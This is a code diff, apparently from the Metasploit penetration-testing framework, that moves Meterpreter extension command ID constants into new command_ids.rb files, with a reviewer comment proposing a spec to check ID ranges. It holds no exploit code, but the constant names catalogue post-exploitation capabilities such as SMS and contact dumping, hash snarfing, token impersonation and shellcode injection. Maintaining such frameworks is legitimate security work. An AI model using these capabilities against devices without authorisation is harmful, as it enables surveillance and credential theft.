@@ -1,7 +1,7 @@ -#!/usr/bin/env ruby # # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/android/tlv' +require 'rex/post/meterpreter/extensions/android/command_ids' require 'rex/post/meterpreter/packet' require 'rex/post/meterpreter/client' require 'rex/post/meterpreter/channels/pools/stream_pool' diff --git a/lib/rex/post/meterpreter/extensions/android/command_ids.rb b/lib/rex/post/meterpreter/extensions/android/command_ids.rb new file mode 100644 index 0000000000000..6a8a7620b65b1 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/android/command_ids.rb @@ -0,0 +1,33 @@ +# -*- coding: binary -*- + +module Rex +module Post +module Meterpreter +module Extensions +module Android + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_ANDROID = 5000 + +# Associated command ids +COMMAND_ID_ANDROID_ACTIVITY_START = EXTENSION_ID_ANDROID + 1 +COMMAND_ID_ANDROID_CHECK_ROOT = EXTENSION_ID_ANDROID + 2 +COMMAND_ID_ANDROID_DEVICE_SHUTDOWN = EXTENSION_ID_ANDROID + 3 +COMMAND_ID_ANDROID_DUMP_CALLLOG = EXTENSION_ID_ANDROID + 4 +COMMAND_ID_ANDROID_DUMP_CONTACTS = EXTENSION_ID_ANDROID + 5 +COMMAND_ID_ANDROID_DUMP_SMS = EXTENSION_ID_ANDROID + 6 +COMMAND_ID_ANDROID_GEOLOCATE = EXTENSION_ID_ANDROID + 7 +COMMAND_ID_ANDROID_HIDE_APP_ICON = EXTENSION_ID_ANDROID + 8 +COMMAND_ID_ANDROID_INTERVAL_COLLECT = EXTENSION_ID_ANDROID + 9 +COMMAND_ID_ANDROID_SEND_SMS = EXTENSION_ID_ANDROID + 10 +COMMAND_ID_ANDROID_SET_AUDIO_MODE = EXTENSION_ID_ANDROID + 11 +COMMAND_ID_ANDROID_SET_WALLPAPER = EXTENSION_ID_ANDROID + 12 +COMMAND_ID_ANDROID_SQLITE_QUERY = EXTENSION_ID_ANDROID + 13 +COMMAND_ID_ANDROID_WAKELOCK = EXTENSION_ID_ANDROID + 14 +COMMAND_ID_ANDROID_WLAN_GEOLOCATE = EXTENSION_ID_ANDROID + 15 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 871573020dd0b..7956b1853c182 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb 
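Review bot: The comment `# ID for the extension (needs to be a multiple of 1000)` states an invariant that nothing checks, and with this refactor these constants become the wire-level contract every Meterpreter implementation has to agree on, so a collision between two extensions' EXTENSION_ID_* values, or a command offset reaching 1000 and spilling into the next extension's range, would surface only as a misrouted command at runtime. A small spec that loads every `extensions/*/command_ids.rb`, asserts each `EXTENSION_ID_* % 1000 == 0`, that the extension ids are pairwise distinct, and that every COMMAND_ID_* lies in `EXTENSION_ID..EXTENSION_ID + 999` would pin this down once rather than relying on the comment. The same applies to the command_ids.rb files for appapi, espia, extapi, incognito, kiwi, lanattacks, mimikatz and networkpug later in this patch.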
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -1,4 +1,3 @@ -#!/usr/bin/env ruby # -*- coding: binary -*- module Rex @@ -7,26 +6,6 @@ module Meterpreter module Extensions module Android -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_ANDROID = 5000 - -# Associated command ids -COMMAND_ID_ANDROID_ACTIVITY_START = EXTENSION_ID_ANDROID + 1 -COMMAND_ID_ANDROID_CHECK_ROOT = EXTENSION_ID_ANDROID + 2 -COMMAND_ID_ANDROID_DEVICE_SHUTDOWN = EXTENSION_ID_ANDROID + 3 -COMMAND_ID_ANDROID_DUMP_CALLLOG = EXTENSION_ID_ANDROID + 4 -COMMAND_ID_ANDROID_DUMP_CONTACTS = EXTENSION_ID_ANDROID + 5 -COMMAND_ID_ANDROID_DUMP_SMS = EXTENSION_ID_ANDROID + 6 -COMMAND_ID_ANDROID_GEOLOCATE = EXTENSION_ID_ANDROID + 7 -COMMAND_ID_ANDROID_HIDE_APP_ICON = EXTENSION_ID_ANDROID + 8 -COMMAND_ID_ANDROID_INTERVAL_COLLECT = EXTENSION_ID_ANDROID + 9 -COMMAND_ID_ANDROID_SEND_SMS = EXTENSION_ID_ANDROID + 10 -COMMAND_ID_ANDROID_SET_AUDIO_MODE = EXTENSION_ID_ANDROID + 11 -COMMAND_ID_ANDROID_SET_WALLPAPER = EXTENSION_ID_ANDROID + 12 -COMMAND_ID_ANDROID_SQLITE_QUERY = EXTENSION_ID_ANDROID + 13 -COMMAND_ID_ANDROID_WAKELOCK = EXTENSION_ID_ANDROID + 14 -COMMAND_ID_ANDROID_WLAN_GEOLOCATE = EXTENSION_ID_ANDROID + 15 - TLV_TYPE_SMS_ADDRESS = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9001) TLV_TYPE_SMS_BODY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9002) TLV_TYPE_SMS_TYPE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9003) diff --git a/lib/rex/post/meterpreter/extensions/appapi/appapi.rb b/lib/rex/post/meterpreter/extensions/appapi/appapi.rb index 06878fe0a1364..ee0eb3e181b1b 100644 --- a/lib/rex/post/meterpreter/extensions/appapi/appapi.rb +++ b/lib/rex/post/meterpreter/extensions/appapi/appapi.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/appapi/tlv' +require 'rex/post/meterpreter/extensions/appapi/command_ids' module Rex module Post 
diff --git a/lib/rex/post/meterpreter/extensions/appapi/command_ids.rb b/lib/rex/post/meterpreter/extensions/appapi/command_ids.rb new file mode 100644 index 0000000000000..3a3210056c8e9 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/appapi/command_ids.rb @@ -0,0 +1,20 @@ +# -*- coding: binary -*- +# CorrM @ fb.me/IslamNofl + +module Rex +module Post +module Meterpreter +module Extensions +module AppApi + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_APPAPI = 9000 + +# Associated command ids +COMMAND_ID_APPAPI_APP_INSTALL = EXTENSION_ID_APPAPI + 1 +COMMAND_ID_APPAPI_APP_LIST = EXTENSION_ID_APPAPI + 2 +COMMAND_ID_APPAPI_APP_RUN = EXTENSION_ID_APPAPI + 3 +COMMAND_ID_APPAPI_APP_UNINSTALL = EXTENSION_ID_APPAPI + 4 + +end; end; end; end; end + diff --git a/lib/rex/post/meterpreter/extensions/appapi/tlv.rb b/lib/rex/post/meterpreter/extensions/appapi/tlv.rb index f2b0fbadd34ef..851e9017eb61d 100644 --- a/lib/rex/post/meterpreter/extensions/appapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/appapi/tlv.rb @@ -7,15 +7,6 @@ module Meterpreter module Extensions module AppApi -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_APPAPI = 9000 - -# Associated command ids -COMMAND_ID_APPAPI_APP_INSTALL = EXTENSION_ID_APPAPI + 1 -COMMAND_ID_APPAPI_APP_LIST = EXTENSION_ID_APPAPI + 2 -COMMAND_ID_APPAPI_APP_RUN = EXTENSION_ID_APPAPI + 3 -COMMAND_ID_APPAPI_APP_UNINSTALL = EXTENSION_ID_APPAPI + 4 - ## # # Apps diff --git a/lib/rex/post/meterpreter/extensions/espia/command_ids.rb b/lib/rex/post/meterpreter/extensions/espia/command_ids.rb new file mode 100644 index 0000000000000..ca46e01dc81bd --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/espia/command_ids.rb 
@@ -0,0 +1,18 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Espia + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_ESPIA = 11000 + +# Associated command ids +COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN = EXTENSION_ID_ESPIA + 1 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/espia/espia.rb b/lib/rex/post/meterpreter/extensions/espia/espia.rb index 06da92e21fdb6..32c30f93cdb42 100644 --- a/lib/rex/post/meterpreter/extensions/espia/espia.rb +++ b/lib/rex/post/meterpreter/extensions/espia/espia.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/espia/tlv' +require 'rex/post/meterpreter/extensions/espia/command_ids' module Rex module Post diff --git a/lib/rex/post/meterpreter/extensions/espia/tlv.rb b/lib/rex/post/meterpreter/extensions/espia/tlv.rb index e9d62de91920b..1ae21b9bb207a 100644 --- a/lib/rex/post/meterpreter/extensions/espia/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/espia/tlv.rb @@ -5,12 +5,6 @@ module Meterpreter module Extensions module Espia -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_ESPIA = 11000 - -# Associated command ids -COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN = EXTENSION_ID_ESPIA + 1 - TLV_TYPE_DEV_IMAGE = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 911) TLV_TYPE_DEV_AUDIO = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 912) TLV_TYPE_DEV_SCREEN = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 913) diff --git a/lib/rex/post/meterpreter/extensions/extapi/command_ids.rb b/lib/rex/post/meterpreter/extensions/extapi/command_ids.rb new file mode 100644 index 0000000000000..a35380da8c6e9 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/extapi/command_ids.rb 
@@ -0,0 +1,33 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Extapi + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_EXTAPI = 3000 + +# Associated command ids +COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY = EXTENSION_ID_EXTAPI + 1 +COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA = EXTENSION_ID_EXTAPI + 2 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP = EXTENSION_ID_EXTAPI + 3 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE = EXTENSION_ID_EXTAPI + 4 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE = EXTENSION_ID_EXTAPI + 5 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME = EXTENSION_ID_EXTAPI + 6 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START = EXTENSION_ID_EXTAPI + 7 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP = EXTENSION_ID_EXTAPI + 8 +COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA = EXTENSION_ID_EXTAPI + 9 +COMMAND_ID_EXTAPI_NTDS_PARSE = EXTENSION_ID_EXTAPI + 10 +COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY = EXTENSION_ID_EXTAPI + 11 +COMMAND_ID_EXTAPI_SERVICE_CONTROL = EXTENSION_ID_EXTAPI + 12 +COMMAND_ID_EXTAPI_SERVICE_ENUM = EXTENSION_ID_EXTAPI + 13 +COMMAND_ID_EXTAPI_SERVICE_QUERY = EXTENSION_ID_EXTAPI + 14 +COMMAND_ID_EXTAPI_WINDOW_ENUM = EXTENSION_ID_EXTAPI + 15 +COMMAND_ID_EXTAPI_WMI_QUERY = EXTENSION_ID_EXTAPI + 16 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb index 05dc02c946f0d..f58bfae75b49a 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/extapi/tlv' +require 'rex/post/meterpreter/extensions/extapi/command_ids' require 'rex/post/meterpreter/extensions/extapi/window/window' require 'rex/post/meterpreter/extensions/extapi/service/service' require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard' 
diff --git a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb index 609fd8e49a329..9f4c09c95a459 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb @@ -5,27 +5,6 @@ module Meterpreter module Extensions module Extapi -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_EXTAPI = 3000 - -# Associated command ids -COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY = EXTENSION_ID_EXTAPI + 1 -COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA = EXTENSION_ID_EXTAPI + 2 -COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP = EXTENSION_ID_EXTAPI + 3 -COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE = EXTENSION_ID_EXTAPI + 4 -COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE = EXTENSION_ID_EXTAPI + 5 -COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME = EXTENSION_ID_EXTAPI + 6 -COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START = EXTENSION_ID_EXTAPI + 7 -COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP = EXTENSION_ID_EXTAPI + 8 -COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA = EXTENSION_ID_EXTAPI + 9 -COMMAND_ID_EXTAPI_NTDS_PARSE = EXTENSION_ID_EXTAPI + 10 -COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY = EXTENSION_ID_EXTAPI + 11 -COMMAND_ID_EXTAPI_SERVICE_CONTROL = EXTENSION_ID_EXTAPI + 12 -COMMAND_ID_EXTAPI_SERVICE_ENUM = EXTENSION_ID_EXTAPI + 13 -COMMAND_ID_EXTAPI_SERVICE_QUERY = EXTENSION_ID_EXTAPI + 14 -COMMAND_ID_EXTAPI_WINDOW_ENUM = EXTENSION_ID_EXTAPI + 15 -COMMAND_ID_EXTAPI_WMI_QUERY = EXTENSION_ID_EXTAPI + 16 - TLV_TYPE_EXTENSION_EXTAPI = 0 TLV_TYPE_EXT_WINDOW_ENUM_GROUP = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 1) diff --git a/lib/rex/post/meterpreter/extensions/incognito/command_ids.rb b/lib/rex/post/meterpreter/extensions/incognito/command_ids.rb new file mode 100644 index 0000000000000..1621881f1d8c2 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/incognito/command_ids.rb 
@@ -0,0 +1,23 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Incognito + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_INCOGNITO = 12000 + +# Associated command ids +COMMAND_ID_INCOGNITO_ADD_GROUP_USER = EXTENSION_ID_INCOGNITO + 1 +COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER = EXTENSION_ID_INCOGNITO + 2 +COMMAND_ID_INCOGNITO_ADD_USER = EXTENSION_ID_INCOGNITO + 3 +COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN = EXTENSION_ID_INCOGNITO + 4 +COMMAND_ID_INCOGNITO_LIST_TOKENS = EXTENSION_ID_INCOGNITO + 5 +COMMAND_ID_INCOGNITO_SNARF_HASHES = EXTENSION_ID_INCOGNITO + 6 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb index bfddad0c6af8b..360262674fab6 100644 --- a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +++ b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/incognito/tlv' +require 'rex/post/meterpreter/extensions/incognito/command_ids' module Rex module Post diff --git a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb index 9dadb86ab2e77..586e69171abe6 100644 --- a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb 
@@ -5,17 +5,6 @@ module Meterpreter module Extensions module Incognito -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_INCOGNITO = 12000 - -# Associated command ids -COMMAND_ID_INCOGNITO_ADD_GROUP_USER = EXTENSION_ID_INCOGNITO + 1 -COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER = EXTENSION_ID_INCOGNITO + 2 -COMMAND_ID_INCOGNITO_ADD_USER = EXTENSION_ID_INCOGNITO + 3 -COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN = EXTENSION_ID_INCOGNITO + 4 -COMMAND_ID_INCOGNITO_LIST_TOKENS = EXTENSION_ID_INCOGNITO + 5 -COMMAND_ID_INCOGNITO_SNARF_HASHES = EXTENSION_ID_INCOGNITO + 6 - TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 4) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/command_ids.rb b/lib/rex/post/meterpreter/extensions/kiwi/command_ids.rb new file mode 100644 index 0000000000000..1be5da5edd019 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/kiwi/command_ids.rb @@ -0,0 +1,18 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Kiwi + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_KIWI = 8000 + +# Associated command ids +COMMAND_ID_KIWI_EXEC_CMD = EXTENSION_ID_KIWI + 1 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 7c0d820df925c..d38291a0577e5 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/kiwi/tlv' +require 'rex/post/meterpreter/extensions/kiwi/command_ids' require 'rexml/document' require 'set' 
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 7437679256de5..566aa7711df4e 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -5,12 +5,6 @@ module Meterpreter module Extensions module Kiwi -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_KIWI = 8000 - -# Associated command ids -COMMAND_ID_KIWI_EXEC_CMD = EXTENSION_ID_KIWI + 1 - TLV_TYPE_KIWI_CMD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 100) TLV_TYPE_KIWI_CMD_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 101) diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/command_ids.rb b/lib/rex/post/meterpreter/extensions/lanattacks/command_ids.rb new file mode 100644 index 0000000000000..dfc30012dc8ec --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/lanattacks/command_ids.rb @@ -0,0 +1,26 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Lanattacks + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_LANATTACKS = 15000 + +# Associated command ids +COMMAND_ID_LANATTACKS_ADD_TFTP_FILE = EXTENSION_ID_LANATTACKS + 1 +COMMAND_ID_LANATTACKS_DHCP_LOG = EXTENSION_ID_LANATTACKS + 2 +COMMAND_ID_LANATTACKS_RESET_DHCP = EXTENSION_ID_LANATTACKS + 3 +COMMAND_ID_LANATTACKS_RESET_TFTP = EXTENSION_ID_LANATTACKS + 4 +COMMAND_ID_LANATTACKS_SET_DHCP_OPTION = EXTENSION_ID_LANATTACKS + 5 +COMMAND_ID_LANATTACKS_START_DHCP = EXTENSION_ID_LANATTACKS + 6 +COMMAND_ID_LANATTACKS_START_TFTP = EXTENSION_ID_LANATTACKS + 7 +COMMAND_ID_LANATTACKS_STOP_DHCP = EXTENSION_ID_LANATTACKS + 8 +COMMAND_ID_LANATTACKS_STOP_TFTP = EXTENSION_ID_LANATTACKS + 9 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb index af3aafe3b184a..5b4e9169030f1 100644 
--- a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb +++ b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/lanattacks/tlv' +require 'rex/post/meterpreter/extensions/lanattacks/command_ids' require 'rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp' require 'rex/post/meterpreter/extensions/lanattacks/tftp/tftp' diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb index d54b673872e5e..7a71196578244 100644 --- a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb @@ -5,20 +5,6 @@ module Meterpreter module Extensions module Lanattacks -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_LANATTACKS = 15000 - -# Associated command ids -COMMAND_ID_LANATTACKS_ADD_TFTP_FILE = EXTENSION_ID_LANATTACKS + 1 -COMMAND_ID_LANATTACKS_DHCP_LOG = EXTENSION_ID_LANATTACKS + 2 -COMMAND_ID_LANATTACKS_RESET_DHCP = EXTENSION_ID_LANATTACKS + 3 -COMMAND_ID_LANATTACKS_RESET_TFTP = EXTENSION_ID_LANATTACKS + 4 -COMMAND_ID_LANATTACKS_SET_DHCP_OPTION = EXTENSION_ID_LANATTACKS + 5 -COMMAND_ID_LANATTACKS_START_DHCP = EXTENSION_ID_LANATTACKS + 6 -COMMAND_ID_LANATTACKS_START_TFTP = EXTENSION_ID_LANATTACKS + 7 -COMMAND_ID_LANATTACKS_STOP_DHCP = EXTENSION_ID_LANATTACKS + 8 -COMMAND_ID_LANATTACKS_STOP_TFTP = EXTENSION_ID_LANATTACKS + 9 - TLV_TYPE_LANATTACKS_OPTION = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1) TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_LANATTACKS_UINT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 3) diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/command_ids.rb b/lib/rex/post/meterpreter/extensions/mimikatz/command_ids.rb new file mode 100644 index 0000000000000..529dc90fecd77 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/mimikatz/command_ids.rb 
@@ -0,0 +1,18 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Mimikatz + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_MIMIKATZ = 17000 + +# Associated command ids +COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND = EXTENSION_ID_MIMIKATZ + 1 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb index 9952f2321a03f..9e86dadc8fe9a 100644 --- a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb +++ b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/mimikatz/tlv' +require 'rex/post/meterpreter/extensions/mimikatz/command_ids' require 'csv' module Rex diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb index fb75fa41e7299..c260720b4a5f3 100644 --- a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb @@ -5,12 +5,6 @@ module Meterpreter module Extensions module Mimikatz -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_MIMIKATZ = 17000 - -# Associated command ids -COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND = EXTENSION_ID_MIMIKATZ + 1 - TLV_TYPE_MIMIKATZ_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) TLV_TYPE_MIMIKATZ_FUNCTION = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_MIMIKATZ_ARGUMENT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) diff --git a/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb b/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb new file mode 100644 index 0000000000000..569fe9a31d85d --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/networkpug/command_ids.rb 
@@ -0,0 +1,19 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module NetworkPug + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_NETWORKPUG = 6000 + +# Associated command ids +COMMAND_ID_NETWORKPUG_START = EXTENSION_ID_NETWORKPUG + 1 +COMMAND_ID_NETWORKPUG_STOP = EXTENSION_ID_NETWORKPUG + 2 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb index 8f4abdc2d5a34..d5810df46f896 100644 --- a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +++ b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/networkpug/tlv' +require 'rex/post/meterpreter/extensions/networkpug/command_ids' module Rex module Post diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb index 22f6b0a9b0e5d..54e5941ab8ab9 100644 --- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb @@ -5,13 +5,6 @@ module Meterpreter module Extensions module NetworkPug -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_NETWORKPUG = 6000 - -# Associated command ids -COMMAND_ID_NETWORKPUG_START = EXTENSION_ID_NETWORKPUG + 1 -COMMAND_ID_NETWORKPUG_STOP = EXTENSION_ID_NETWORKPUG + 2 - TLV_TYPE_EXTENSION_NETWORKPUG = 0 TLV_TYPE_NETWORKPUG_INTERFACE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1) TLV_TYPE_NETWORKPUG_FILTER = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 2) diff --git a/lib/rex/post/meterpreter/extensions/peinjector/command_ids.rb b/lib/rex/post/meterpreter/extensions/peinjector/command_ids.rb new file mode 100644 index 0000000000000..d1c23112d28d0 --- /dev/null 
+++ b/lib/rex/post/meterpreter/extensions/peinjector/command_ids.rb @@ -0,0 +1,18 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Peinjector + +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_PEINJECTOR = 16000 + +# Associated command ids +COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE = EXTENSION_ID_PEINJECTOR + 1 + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb b/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb index 52b5a91878071..dd90e91e3e56d 100644 --- a/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb +++ b/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/peinjector/tlv' +require 'rex/post/meterpreter/extensions/peinjector/command_ids' module Rex module Post diff --git a/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb index 117d079132b99..f46604363f313 100644 --- a/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb @@ -5,12 +5,6 @@ module Meterpreter module Extensions module Peinjector -# ID for the extension (needs to be a multiple of 1000) -EXTENSION_ID_PEINJECTOR = 16000 - -# Associated command ids -COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE = EXTENSION_ID_PEINJECTOR + 1 - TLV_TYPE_PEINJECTOR_SHELLCODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1) TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2) TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64 = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3) diff --git a/lib/rex/post/meterpreter/extensions/powershell/command_ids.rb b/lib/rex/post/meterpreter/extensions/powershell/command_ids.rb new file mode 100644 index 0000000000000..1e5a21bca84e0 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/powershell/command_ids.rb 
